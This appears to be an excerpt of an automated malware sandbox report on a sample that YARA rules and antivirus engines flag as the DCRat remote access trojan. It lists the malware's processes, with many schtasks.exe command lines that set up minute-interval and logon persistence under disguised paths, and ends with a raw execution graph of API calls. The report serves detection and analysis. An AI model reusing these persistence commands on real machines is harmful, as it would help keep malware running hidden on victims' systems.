                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:17
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:18
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Program Files\Windows Portable Devices\Idle.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Portable Devices\Idle.exe"
                Imagebase:0x7d0000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 76%, ReversingLabs
                Has exited:true

                Target ID:19
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:20
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:21
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Program Files\Windows Portable Devices\Idle.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Portable Devices\Idle.exe"
                Imagebase:0x180000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                Target ID:22
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:23
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Wow64 process (32bit):false
                Commandline:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Imagebase:0x4e0000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 76%, ReversingLabs
                Has exited:true

                Target ID:24
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:25
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:26
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Wow64 process (32bit):false
                Commandline:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Imagebase:0xf80000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1838303042.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                Target ID:27
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 8 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:28
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:29
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:30
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:31
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:32
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:33
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:34
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:35
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:36
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:37
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:38
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:39
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:40
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:41
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:42
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat"
                Imagebase:0x7ff70aac0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:43
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                  Execution Graph

                  Execution Coverage:9.8%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.3%
                  Total number of Nodes:1498
                  Total number of Limit Nodes:26
SetFocus 24009->24015 24016 18afde SetDlgItemTextW 24011->24016 24017 18af58 24012->24017 24013 18b641 GetDlgItem 24018 18b65e 24013->24018 24019 18b664 SetWindowTextW 24013->24019 24014->24015 24020 18b0d5 24015->24020 24032 18b0ed 24015->24032 24021 18afec 24016->24021 24257 171241 SHGetMalloc 24017->24257 24018->24019 24236 18a2c7 GetClassNameW 24019->24236 24026 17ddd1 53 API calls 24020->24026 24030 18aff9 GetMessageW 24021->24030 24021->24057 24023 18af5f 24027 18af63 SetDlgItemTextW 24023->24027 24023->24057 24024 18b56b 24028 17ddd1 53 API calls 24024->24028 24031 18b0df 24026->24031 24027->24057 24033 18b57b SetDlgItemTextW 24028->24033 24035 18b010 IsDialogMessageW 24030->24035 24030->24057 24258 18cb5a 24031->24258 24040 17ddd1 53 API calls 24032->24040 24037 18b58f 24033->24037 24035->24021 24039 18b01f TranslateMessage DispatchMessageW 24035->24039 24043 17ddd1 53 API calls 24037->24043 24039->24021 24042 18b124 24040->24042 24041 18b6af 24045 18b6df 24041->24045 24050 17ddd1 53 API calls 24041->24050 24046 17400a _swprintf 51 API calls 24042->24046 24047 18b5b8 24043->24047 24044 18bdf5 98 API calls 24044->24041 24056 18bdf5 98 API calls 24045->24056 24078 18b797 24045->24078 24051 18b136 24046->24051 24052 17ddd1 53 API calls 24047->24052 24048 18b0e6 24162 17a04f 24048->24162 24054 18b6c2 SetDlgItemTextW 24050->24054 24055 18cb5a 16 API calls 24051->24055 24052->24057 24064 17ddd1 53 API calls 24054->24064 24055->24048 24065 18b6fa 24056->24065 24058 18b847 24061 18b859 24058->24061 24062 18b850 EnableWindow 24058->24062 24059 18b17f 24168 18a322 SetCurrentDirectoryW 24059->24168 24060 18b174 GetLastError 24060->24059 24066 18b876 24061->24066 24276 1712c8 GetDlgItem EnableWindow 24061->24276 24062->24061 24068 18b6d6 SetDlgItemTextW 24064->24068 24074 18b70c 24065->24074 24088 18b731 24065->24088 24073 18b89d 24066->24073 24080 18b895 SendMessageW 24066->24080 24067 18b195 24071 18b19e GetLastError 24067->24071 24072 18b1ac 24067->24072 
24068->24045 24070 18b78a 24076 18bdf5 98 API calls 24070->24076 24071->24072 24084 18b237 24072->24084 24085 18b1c4 GetTickCount 24072->24085 24128 18b227 24072->24128 24073->24057 24081 17ddd1 53 API calls 24073->24081 24274 189635 32 API calls 24074->24274 24075 18b86c 24277 1712c8 GetDlgItem EnableWindow 24075->24277 24076->24078 24078->24058 24086 18b825 24078->24086 24093 17ddd1 53 API calls 24078->24093 24080->24073 24087 18b8b6 SetDlgItemTextW 24081->24087 24082 18b725 24082->24088 24083 18b46c 24177 1712e6 GetDlgItem ShowWindow 24083->24177 24090 18b24f GetModuleFileNameW 24084->24090 24097 18b407 24084->24097 24091 17400a _swprintf 51 API calls 24085->24091 24275 189635 32 API calls 24086->24275 24087->24057 24088->24070 24094 18bdf5 98 API calls 24088->24094 24268 17eb3a 80 API calls 24090->24268 24098 18b1dd 24091->24098 24093->24078 24100 18b75f 24094->24100 24095 18b47c 24178 1712e6 GetDlgItem ShowWindow 24095->24178 24097->24003 24103 17ddd1 53 API calls 24097->24103 24169 17971e 24098->24169 24099 18b844 24099->24058 24100->24070 24104 18b768 DialogBoxParamW 24100->24104 24102 18b275 24106 17400a _swprintf 51 API calls 24102->24106 24107 18b41b 24103->24107 24104->24003 24104->24070 24105 18b486 24108 17ddd1 53 API calls 24105->24108 24109 18b297 CreateFileMappingW 24106->24109 24110 17400a _swprintf 51 API calls 24107->24110 24114 18b490 SetDlgItemTextW 24108->24114 24115 18b2f9 GetCommandLineW 24109->24115 24146 18b376 __vsnwprintf_l 24109->24146 24112 18b439 24110->24112 24126 17ddd1 53 API calls 24112->24126 24113 18b203 24116 18b215 24113->24116 24117 18b20a GetLastError 24113->24117 24179 1712e6 GetDlgItem ShowWindow 24114->24179 24120 18b30a 24115->24120 24122 179653 79 API calls 24116->24122 24117->24116 24118 18b381 ShellExecuteExW 24141 18b39e 24118->24141 24269 18ab2e SHGetMalloc 24120->24269 24122->24128 24123 18b4a2 SetDlgItemTextW GetDlgItem 24124 18b4bf GetWindowLongW SetWindowLongW 24123->24124 24125 18b4d7 24123->24125 24124->24125 
24180 18bdf5 24125->24180 24126->24003 24127 18b326 24270 18ab2e SHGetMalloc 24127->24270 24128->24083 24128->24084 24132 18b332 24271 18ab2e SHGetMalloc 24132->24271 24133 18b3e1 24133->24097 24140 18b3f7 UnmapViewOfFile CloseHandle 24133->24140 24134 18bdf5 98 API calls 24136 18b4f3 24134->24136 24205 18d0f5 24136->24205 24137 18b33e 24272 17ecad 80 API calls ___scrt_get_show_window_mode 24137->24272 24140->24097 24141->24133 24144 18b3cd Sleep 24141->24144 24143 18b355 MapViewOfFile 24143->24146 24144->24133 24144->24141 24145 18bdf5 98 API calls 24150 18b519 24145->24150 24146->24118 24147 18b542 24273 1712c8 GetDlgItem EnableWindow 24147->24273 24149->24003 24149->24024 24150->24147 24151 18bdf5 98 API calls 24150->24151 24151->24147 24153 17136d 24152->24153 24155 171314 24152->24155 24279 17da71 GetWindowLongW SetWindowLongW 24153->24279 24156 17137a 24155->24156 24278 17da98 62 API calls 2 library calls 24155->24278 24156->23993 24156->23994 24156->24057 24158 171336 24158->24156 24159 171349 GetDlgItem 24158->24159 24159->24156 24160 171359 24159->24160 24160->24156 24161 17135f SetWindowTextW 24160->24161 24161->24156 24164 17a059 24162->24164 24163 17a0ea 24165 17a207 9 API calls 24163->24165 24167 17a113 24163->24167 24164->24163 24164->24167 24280 17a207 24164->24280 24165->24167 24167->24059 24167->24060 24168->24067 24170 179728 24169->24170 24171 179792 CreateFileW 24170->24171 24172 179786 24170->24172 24171->24172 24173 1797e4 24172->24173 24174 17b66c 2 API calls 24172->24174 24173->24113 24175 1797cb 24174->24175 24175->24173 24176 1797cf CreateFileW 24175->24176 24176->24173 24177->24095 24178->24105 24179->24123 24181 18bdff __EH_prolog 24180->24181 24182 18b4e5 24181->24182 24183 18aa36 ExpandEnvironmentStringsW 24181->24183 24182->24134 24192 18be36 _wcsrchr 24183->24192 24185 18aa36 ExpandEnvironmentStringsW 24185->24192 24186 18c11d SetWindowTextW 24186->24192 24189 1935de 22 API calls 24189->24192 24191 18bf0b SetFileAttributesW 24193 
18bfc5 GetFileAttributesW 24191->24193 24204 18bf25 ___scrt_get_show_window_mode 24191->24204 24192->24182 24192->24185 24192->24186 24192->24189 24192->24191 24197 18c2e7 GetDlgItem SetWindowTextW SendMessageW 24192->24197 24201 18c327 SendMessageW 24192->24201 24301 1817ac CompareStringW 24192->24301 24302 189da4 GetCurrentDirectoryW 24192->24302 24304 17a52a 7 API calls 24192->24304 24305 17a4b3 FindClose 24192->24305 24306 18ab9a 76 API calls ___std_exception_copy 24192->24306 24193->24192 24196 18bfd7 DeleteFileW 24193->24196 24196->24192 24198 18bfe8 24196->24198 24197->24192 24199 17400a _swprintf 51 API calls 24198->24199 24200 18c008 GetFileAttributesW 24199->24200 24200->24198 24202 18c01d MoveFileW 24200->24202 24201->24192 24202->24192 24203 18c035 MoveFileExW 24202->24203 24203->24192 24204->24192 24204->24193 24303 17b4f7 52 API calls 2 library calls 24204->24303 24206 18d0ff __EH_prolog 24205->24206 24307 17fead 24206->24307 24208 18d130 24311 175c59 24208->24311 24210 18d14e 24315 177c68 24210->24315 24214 18d1a1 24332 177cfb 24214->24332 24216 18b504 24216->24145 24218 18cd38 24217->24218 24219 189d1a 4 API calls 24218->24219 24220 18cd3d 24219->24220 24221 18cd45 GetWindow 24220->24221 24222 18b5d1 24220->24222 24221->24222 24225 18cd65 24221->24225 24222->23999 24222->24000 24223 18cd72 GetClassNameW 24766 1817ac CompareStringW 24223->24766 24225->24222 24225->24223 24226 18cdfa GetWindow 24225->24226 24227 18cd96 GetWindowLongW 24225->24227 24226->24222 24226->24225 24227->24226 24228 18cda6 SendMessageW 24227->24228 24228->24226 24229 18cdbc GetObjectW 24228->24229 24767 189d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24229->24767 24231 18cdd3 24768 189d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24231->24768 24769 189f5d 8 API calls ___scrt_get_show_window_mode 24231->24769 24234 18cde4 SendMessageW DeleteObject 24234->24226 24235->24013 24237 18a2e8 24236->24237 24242 18a30d 24236->24242 24770 1817ac CompareStringW 24237->24770 24239 
18a31b 24244 18a7c3 24239->24244 24240 18a312 SHAutoComplete 24240->24239 24241 18a2fb 24241->24242 24243 18a2ff FindWindowExW 24241->24243 24242->24239 24242->24240 24243->24242 24245 18a7cd __EH_prolog 24244->24245 24246 171380 82 API calls 24245->24246 24247 18a7ef 24246->24247 24771 171f4f 24247->24771 24250 18a818 24253 171951 126 API calls 24250->24253 24251 18a809 24252 171631 84 API calls 24251->24252 24254 18a814 24252->24254 24255 18a83a __vsnwprintf_l ___std_exception_copy 24253->24255 24254->24041 24254->24044 24255->24254 24256 171631 84 API calls 24255->24256 24256->24254 24257->24023 24259 18ac74 5 API calls 24258->24259 24260 18cb66 GetDlgItem 24259->24260 24261 18cb88 24260->24261 24262 18cbbc SendMessageW SendMessageW 24260->24262 24265 18cb93 ShowWindow SendMessageW SendMessageW 24261->24265 24263 18cbf8 24262->24263 24264 18cc17 SendMessageW SendMessageW SendMessageW 24262->24264 24263->24264 24266 18cc4a SendMessageW 24264->24266 24267 18cc6d SendMessageW 24264->24267 24265->24262 24266->24267 24267->24048 24268->24102 24269->24127 24270->24132 24271->24137 24272->24143 24273->24149 24274->24082 24275->24099 24276->24075 24277->24066 24278->24158 24279->24156 24281 17a214 24280->24281 24282 17a238 24281->24282 24283 17a22b CreateDirectoryW 24281->24283 24284 17a180 4 API calls 24282->24284 24283->24282 24285 17a26b 24283->24285 24286 17a23e 24284->24286 24289 17a27a 24285->24289 24293 17a444 24285->24293 24287 17a27e GetLastError 24286->24287 24290 17b66c 2 API calls 24286->24290 24287->24289 24289->24164 24291 17a254 24290->24291 24291->24287 24292 17a258 CreateDirectoryW 24291->24292 24292->24285 24292->24287 24294 18e360 24293->24294 24295 17a451 SetFileAttributesW 24294->24295 24296 17a467 24295->24296 24297 17a494 24295->24297 24298 17b66c 2 API calls 24296->24298 24297->24289 24299 17a47b 24298->24299 24299->24297 24300 17a47f SetFileAttributesW 24299->24300 24300->24297 24301->24192 24302->24192 24303->24204 24304->24192 24305->24192 
24306->24192 24308 17feba 24307->24308 24336 171789 24308->24336 24310 17fed2 24310->24208 24312 17fead 24311->24312 24313 171789 76 API calls 24312->24313 24314 17fed2 24313->24314 24314->24210 24316 177c72 __EH_prolog 24315->24316 24353 17c827 24316->24353 24318 177c8d 24319 18e24a new 8 API calls 24318->24319 24320 177cb7 24319->24320 24359 18440b 24320->24359 24323 177ddf 24324 177de9 24323->24324 24329 177e53 24324->24329 24388 17a4c6 24324->24388 24326 177f06 24326->24214 24327 177ec4 24327->24326 24394 176dc1 74 API calls 24327->24394 24329->24327 24331 17a4c6 8 API calls 24329->24331 24366 17837f 24329->24366 24331->24329 24333 177d09 24332->24333 24335 177d10 24332->24335 24334 181acf 84 API calls 24333->24334 24334->24335 24337 17179f 24336->24337 24348 1717fa __vsnwprintf_l 24336->24348 24338 1717c8 24337->24338 24349 176e91 74 API calls __vswprintf_c_l 24337->24349 24340 171827 24338->24340 24345 1717e7 ___std_exception_copy 24338->24345 24342 1935de 22 API calls 24340->24342 24341 1717be 24350 176efd 75 API calls 24341->24350 24344 17182e 24342->24344 24344->24348 24352 176efd 75 API calls 24344->24352 24345->24348 24351 176efd 75 API calls 24345->24351 24348->24310 24349->24341 24350->24338 24351->24348 24352->24348 24354 17c831 __EH_prolog 24353->24354 24355 18e24a new 8 API calls 24354->24355 24356 17c874 24355->24356 24357 18e24a new 8 API calls 24356->24357 24358 17c898 24357->24358 24358->24318 24360 184415 __EH_prolog 24359->24360 24361 18e24a new 8 API calls 24360->24361 24363 184431 24361->24363 24362 177ce6 24362->24323 24363->24362 24365 1806ba 78 API calls 24363->24365 24365->24362 24367 178389 __EH_prolog 24366->24367 24395 171380 24367->24395 24369 1783a4 24403 179ef7 24369->24403 24375 1783d3 24523 171631 24375->24523 24376 17846e 24422 178517 24376->24422 24380 1784ce 24426 171f00 24380->24426 24383 1783cf 24383->24375 24383->24376 24385 17a4c6 8 API calls 24383->24385 24527 17bac4 CompareStringW 24383->24527 24384 1784d9 24384->24375 
24430 173aac 24384->24430 24440 17857b 24384->24440 24385->24383 24389 17a4db 24388->24389 24393 17a4df 24389->24393 24754 17a5f4 24389->24754 24391 17a4ef 24392 17a4f4 FindClose 24391->24392 24391->24393 24392->24393 24393->24324 24394->24326 24396 171385 __EH_prolog 24395->24396 24397 17c827 8 API calls 24396->24397 24398 1713bd 24397->24398 24399 18e24a new 8 API calls 24398->24399 24402 171416 ___scrt_get_show_window_mode 24398->24402 24400 171403 24399->24400 24401 17b07d 82 API calls 24400->24401 24400->24402 24401->24402 24402->24369 24404 179f0e 24403->24404 24405 1783ba 24404->24405 24529 176f5d 76 API calls 24404->24529 24405->24375 24407 1719a6 24405->24407 24408 1719b0 __EH_prolog 24407->24408 24419 171a00 24408->24419 24420 1719e5 24408->24420 24530 17709d 24408->24530 24410 171b50 24533 176dc1 74 API calls 24410->24533 24412 173aac 97 API calls 24416 171bb3 24412->24416 24413 171b60 24413->24412 24413->24420 24414 171bff 24414->24420 24421 171c32 24414->24421 24534 176dc1 74 API calls 24414->24534 24416->24414 24417 173aac 97 API calls 24416->24417 24417->24416 24418 173aac 97 API calls 24418->24421 24419->24410 24419->24413 24419->24420 24420->24383 24421->24418 24421->24420 24423 178524 24422->24423 24552 180c26 GetSystemTime SystemTimeToFileTime 24423->24552 24425 178488 24425->24380 24528 181359 72 API calls 24425->24528 24428 171f05 __EH_prolog 24426->24428 24427 171f39 24427->24384 24428->24427 24554 171951 24428->24554 24431 173abc 24430->24431 24432 173ab8 24430->24432 24433 173af7 24431->24433 24434 173ae9 24431->24434 24432->24384 24689 1727e8 97 API calls 3 library calls 24433->24689 24436 173b29 24434->24436 24688 173281 85 API calls 3 library calls 24434->24688 24436->24384 24438 173af5 24438->24436 24690 17204e 74 API calls 24438->24690 24441 178585 __EH_prolog 24440->24441 24442 1785be 24441->24442 24450 1785c2 24441->24450 24713 1884bd 99 API calls 24441->24713 24443 1785e7 24442->24443 24448 17867a 24442->24448 24442->24450 24444 
